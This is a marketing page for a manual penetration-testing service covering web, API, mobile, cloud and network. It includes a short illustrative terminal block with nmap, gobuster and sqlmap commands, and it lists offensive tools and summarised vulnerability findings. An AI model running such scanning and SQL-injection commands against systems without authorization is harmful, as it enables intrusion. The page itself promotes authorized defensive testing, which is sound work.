Penetration Testing
What the attacker would do we do first.
OWASP, PTES and NIST-aligned manual penetration testing. Certified pentesters push your web application, API, mobile app, cloud and external/internal network like a real attacker. We hand-find the business-logic flaws, chained exploits and privilege escalations that automated scanners never catch, and deliver them in a proof-backed report.
Not a service that runs a scanner and prints a PDF. A discipline that simulates an attacker spending days inside your system, with reproducible proofs and a free retest after the fixes.
280+
Pentest projects
CVSS3.1
Risk scoring
OSCP/CEH
Certifications
nmap -sV -p- target.partnerfy.co
443/tcp open https nginx 1.18.0 — TLS 1.2
22/tcp open ssh OpenSSH 7.4 (legacy)
gobuster dir -u https://target -w common.txt
/admin (Status: 200) [Size: 4821]
/api/v1/users (Status: 401) [Size: 38]
/.git/config (Status: 200) [Size: 263]
sqlmap -u 'target/login' --data 'u=a&p=b'
[INFO] testing 'AND boolean-based blind'
[INFO] parameter 'u' is vulnerable
[CRITICAL] SQL Injection — CVE-2024-XXXX — CVSS 9.8
Kill chain
MITRE ATT&CK
Pentest Report — Findings
RPT-2026-0541
SQL Injection in login form
CVSS 9.8
CRIT
Weak JWT secret — brute-force
CVSS 9.1
CRIT
IDOR — /api/v1/users/{id}
CVSS 8.2
HIGH
Stored XSS — comments
CVSS 7.4
HIGH
CORS misconfiguration
CVSS 6.1
MED
Missing HSTS header
CVSS 3.7
LOW
FIXED
The problem
Why automated scanners aren't enough.
Scanners like Nessus, Acunetix and OWASP ZAP help — but they are no replacement for an attacker. An attacker chains exploits, reads your business rules and weaponises them, ignores noise and finds the real way in. A scanner runs a checklist; a pentester forms hypotheses specific to your system.
No chained exploits
A scanner shows findings in isolation; an attacker combines three low-risk issues into one critical chain.
Misses business logic
A scanner will never catch a logic bug like "multiply order total by -1".
No creativity
A pentester forms hypotheses unique to your app; scanners only match signatures.
Pile of false positives
70% of a 500-page scanner report is noise. A pentester validates every finding by hand.
No authz nuance
"This user must not see this record" can only be tested by someone who knows your domain.
Won't bypass CAPTCHA/WAF
An attacker bypasses the WAF; a scanner stops at the first 403.
No social engineering
The real entry is sometimes an email. A scanner cannot run a phishing simulation.
No anti-forensics test
Attackers cover their tracks; whether your SOC notices can only be measured by a red team.
Attack visualisation
Where are the holes, and how critical?
For every engagement we summarise findings in three visuals: a category heatmap, an OWASP Top 10 checklist and a "scan → find → fix → retest → clean" timeline.
Vulnerability category heatmap
Critical
High
Med
Low
XSS
SQLi
Auth
CORS
Crypto
Logic
IDOR
CSRF
SSRF
Upload
Headers
Deps
Each cell is a category; the dots show finding count and severity. Your manager sees the hot zone at a glance.
OWASP Top 10 — 2021
Checklist
- A01 Broken Access Control
- A02 Cryptographic Failures
- A03 Injection (SQL/XSS/Cmd)
- A04 Insecure Design
- A05 Security Misconfiguration
- A06 Vulnerable Components
- A07 Identification & Auth Failures
- A08 Software & Data Integrity
- A09 Logging & Monitoring Failures
- A10 SSRF
Before vs after
The pentest flow — scan → find → fix → retest → clean
Every stage documented; every finding verified by a free retest after the fix.
01
Scan
Automated + manual recon
02
Find
Validated findings
03
Fix
Remediation + code samples
04
Re-test
Closure verification
05
Clean
Clean attestation
Who is it for?
Who actually needs this pentest?
Pentests are not mandatory for every company — but if you match one of these profiles, you should start today, not someday. The eight typical profiles.
Payment e-commerce
Card data, 3DSecure flows, coupon abuse, price manipulation.
SaaS with customer data
Multi-tenant isolation, user authz boundaries, high IDOR risk.
Regulated fintech
PCI-DSS, FCA-equivalent, GDPR — at least one independent pentest per year.
Healthcare with PHI
Patient data, appointment systems, HIPAA-grade protection.
Government contractor
Before government audits — independent pentest attestation required.
B2B with API integrations
Partner APIs, OAuth flows, identity chains.
AppStore-audited mobile
Token storage, jailbreak/root detection, SSL pinning, MASVS compliance.
Post-incident customer
After a breach: an evidence-backed answer to "is any other door open?".
Service scope
10 distinct pentest capabilities — one team.
From web to cloud, from mobile to physical — one engineering team that covers the entire attack surface. If you need a single app test we do that; if you need a full red team we do that too.
External network pentest
All internet-facing IPs, exposed ports, legacy services.
Internal network pentest
From inside as an employee — path to domain admin.
Web app pentest
OWASP Top 10 + business logic + authz/authn scenarios.
API pentest
REST + GraphQL + gRPC; OWASP API Top 10, rate-limit, BOLA.
Mobile app pentest
iOS + Android, MASVS, Frida, reverse engineering.
Cloud pentest (AWS/Azure/GCP)
IAM misconfig, public buckets, Lambda IAM, K8s RBAC.
Social engineering
Phishing campaign, vishing, USB drop — measures staff awareness.
Physical pentest
Office entry, badge cloning, tailgating, server-room reach.
Red team engagement
Full scenario: from email to domain admin — will your SOC catch it?
Retest after fix
Free verification that fixes actually closed the holes.
Process
Our 6-step pentest method.
Every engagement follows the same discipline: scope document (RoE), reconnaissance, vulnerability assessment, real exploitation, evidence-backed reporting and finally a free retest.
01
Scope and Rules of Engagement
Which systems, which scenarios, allowed hours and rate limits are signed off in a formal RoE document. Production or staging, social-eng in scope or not — all clarified up front.
02
Reconnaissance
OSINT, subdomain enumeration, port mapping, tech fingerprinting, leaked-credential hunts. We photograph the surface through an attacker's eyes.
03
Vulnerability assessment
Scanner output is manually triaged, business-logic scenarios are designed. Every finding becomes a hypothesis.
04
Exploitation
Hypotheses get proven: chained exploits, privilege escalations, data exfiltration — within ethical bounds, fully recorded.
05
Reporting
Executive summary + per-finding evidence + CVSS score + prioritised remediation roadmap. Engineers can drill down to code snippets.
06
Remediation and retest
After fixes ship (usually 4-8 weeks) all Critical/High findings are retested free of charge; closure is verified.
Toolkit
Tools we run on engagements.
Tools matter; the mind using them matters more. Manual testing always leads the scanner.
Burp Suite Pro
OWASP ZAP
Metasploit
Nmap
Nessus
Acunetix
Nuclei
Wireshark
John the Ripper
Hashcat
Cobalt Strike
Postman
ffuf
BloodHound
SQLmap
Frida
MobSF
Kali Linux
Responder
CrackMapExec
From the field
A few real findings we caught.
We keep client names confidential; we share the technical details. Each one was closed before production launch or before any abuse.
E-commerce
CRIT
Pre-launch SQL Injection
Blind SQLi in product search — the full orders table could be dumped. Caught 4 days before launch, migrated to ORM.
SaaS
CRIT
Authentication bypass
JWT accepted "alg:none" — an attacker could enter any tenant as admin.
Bank mobile
CRIT
Insecure token storage
Session token written as plaintext to NSUserDefaults — readable on a rooted device. Migrated to Keychain + biometrics.
B2B API
HIGH
IDOR — another tenant's data
/api/invoices/{id} did not enforce ownership; sequential IDs exposed competitor invoices.
Health portal
HIGH
Reset link not random
The password reset token was derived from epoch + user_id; brute-force could hijack any account.
Enterprise AWS
MED
Public S3 bucket
CI/CD logs went to a public bucket — they contained ephemeral DB credentials.
FAQ
Most-asked pentest questions.
An automated scanner (Nessus, ZAP, Acunetix, etc.) is signature-based: it searches known patterns, most results are false positives and business-logic flaws are never caught. A pentester, by contrast, builds hypotheses specific to your app, chains three weak points into a critical attack, manually attempts privilege escalation and proves every finding with reproducible steps. In practice half of a scanner's "10 critical" results are noise; every finding in a pentest report has been exploited and proven — the engineering team can skip the debate and jump straight to fixing.
All three are valid and measure different things. Black-box starts with the attacker knowing nothing about you — closest to a real attacker but expensive in time and scope. White-box gives the tester source code, architecture diagrams and admin accounts — the deepest test per hour, ideal pre-production. Gray-box sits in the middle: a regular user account plus high-level architecture; for most enterprise pentests this is the most practical compromise because it covers both external and internal attacker models in one engagement. The right choice depends on the goal; we decide it together in the first call.
Managed correctly, no. The Rules of Engagement (RoE) document spells out allowed hours, concurrency limits, isolated test accounts and forbidden actions (DoS, persistent deletions, etc.). In most engagements destructive checks (e.g. brute-force triggering account lockout, payload uploads) only run in staging; in production we collect read-only evidence. There is always a rollback plan: snapshots before testing, on-call engineer reachable for anomalies. 280+ engagements and zero production outages — because the discipline demands the discipline.
It varies by scope. A single web app typically takes 5–10 working days; a medium API engagement 7–12 days; a mobile app 8–14 days; a full red-team scenario 4–8 weeks. On top of this, after fixes ship (usually within 4–8 weeks) the free retest takes about 2–3 working days. Three factors drive duration: breadth of scope, the number of roles/permissions to check and accessibility of the test environment. In the first call we lock the scope and quote fixed days and fixed price; it does not change later.
The report has three layers. First, an executive summary: 1–2 pages, a non-technical risk table, finding counts and overall posture. Second, technical findings: per-finding description, affected component, exploitation steps with screenshots, CVSS 3.1 score and a recommended fix (with code samples). Third, a prioritised action plan: what to fix first, what to fix next — aligned to your sprint cadence. The whole report ships in Markdown + PDF; after the retest it is reissued with "remediated" annotations. Clients submit it directly to ISO 27001, SOC 2 and PCI-DSS audits.
No. The retest of all Critical and High findings from the main engagement is included in the contract price. Only condition: fixes must be deployed within 4–8 weeks (extendable to 12 by agreement) and a testable environment must be available. Closed findings are marked "remediated"; open ones are re-reported. This is our quality guarantee: we don't hand over a report and disappear, we stay until closure. Retesting Medium and Low findings is optional and costs a small fraction of the main engagement.
We use all three in the same engagement. For web apps: OWASP Top 10 (2021) and OWASP ASVS Level 2; for APIs: OWASP API Top 10; for mobile: OWASP MASVS. The methodology follows PTES (Penetration Testing Execution Standard) phases: pre-engagement, intel gathering, threat modelling, vuln analysis, exploitation, post-exploitation, reporting. CVSS 3.1 for risk scoring; NIST SP 800-115 referenced in the report layout. ISO 27001, SOC 2 and PCI-DSS aligned — meaning the report has the shape your auditor expects. Combining the three guarantees both technical depth and audit-readiness.
Yes, every engagement has a lead engineer with at least one industry-recognised certification: OSCP (Offensive Security Certified Professional), OSWE (Offensive Security Web Expert), CEH (Certified Ethical Hacker), CRTP (Certified Red Team Professional) or GPEN (GIAC Penetration Tester). For mobile we also hold eMAPT; for cloud, AWS Security Specialty or AZ-500. Certifications are not mandatory — but when clients ask for the credentials (especially finance and public-sector tenders) we can attach them to the procurement package. More important is that the team produces reproducible findings; certifications signal that but don't guarantee it — we deliver both.
Find your holes before
attackers do.
In a free 30-minute scoping call we lay out the pentest plan together: target systems, RoE, timeline and a fixed price.